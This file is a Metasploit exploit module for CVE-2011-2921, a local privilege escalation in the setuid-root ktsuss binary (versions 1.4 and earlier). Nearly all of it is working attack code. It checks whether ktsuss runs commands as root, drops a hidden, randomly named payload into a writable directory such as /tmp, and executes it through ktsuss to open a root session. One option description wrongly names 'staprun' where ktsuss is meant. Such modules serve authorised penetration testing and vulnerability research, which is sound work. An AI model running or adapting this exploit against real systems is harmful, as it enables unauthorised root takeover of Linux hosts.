modules/exploits/linux/local/ktsuss_suid_priv_esc.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'ktsuss suid Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges by exploiting
a vulnerability in ktsuss versions 1.4 and prior.
The ktsuss executable is setuid root and does not drop
privileges prior to executing user specified commands,
resulting in command execution with root privileges.
This module has been tested successfully on:
ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64); and
ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64).
},
'License' => MSF_LICENSE,
'Author' => [
'John Lightsey', # Discovery and exploit
'bcoles' # Metasploit
],
'DisclosureDate' => '2011-08-13',
'References' => [
['CVE', '2011-2921'],
['URL', 'https://www.openwall.com/lists/oss-security/2011/08/13/2'],
['URL', 'https://security.gentoo.org/glsa/201201-15'],
['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2011-2921/ktsuss-lpe.sh']
],
'Platform' => ['linux'],
'Arch' => [
ARCH_X86,
ARCH_X64,
ARCH_ARMLE,
ARCH_AARCH64,
ARCH_PPC,
ARCH_MIPSLE,
ARCH_MIPSBE
],
'SessionTypes' => ['shell', 'meterpreter'],
'Targets' => [['Auto', {}]],
'DefaultOptions' => {
'AppendExit' => true,
'PrependSetresuid' => true,
'PrependSetresgid' => true,
'PrependSetreuid' => true,
'PrependSetuid' => true,
'PrependFork' => true
},
'Notes' => {
'Reliability' => [ REPEATABLE_SESSION ],
'Stability' => [ CRASH_SAFE ]
},
'DefaultTarget' => 0
)
)
register_options [
OptString.new('KTSUSS_PATH', [true, 'Path to staprun executable', '/usr/bin/ktsuss'])
]
register_advanced_options [
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end
def ktsuss_path
datastore['KTSUSS_PATH']
end
def base_dir
datastore['WritableDir'].to_s
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end
def upload_and_chmodx(path, data)
upload path, data
chmod path
end
def check
return CheckCode::Safe("#{ktsuss_path} file not found") unless file? ktsuss_path
return CheckCode::Safe("#{ktsuss_path} is not setuid") unless setuid? ktsuss_path
vprint_good "#{ktsuss_path} is setuid"
id = cmd_exec 'whoami'
res = cmd_exec("#{ktsuss_path} -u #{id} id").to_s
vprint_status res
unless res.include? 'uid=0'
return CheckCode::Safe
end
CheckCode::Vulnerable
end
def exploit
if !datastore['ForceExploit'] && is_root?
fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
end
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
payload_name = ".#{rand_text_alphanumeric 10..15}"
payload_path = "#{base_dir}/#{payload_name}"
upload_and_chmodx payload_path, generate_payload_exe
print_status 'Executing payload ...'
id = cmd_exec 'whoami'
res = cmd_exec "#{ktsuss_path} -u #{id} #{payload_path} & echo "
vprint_line res
end
end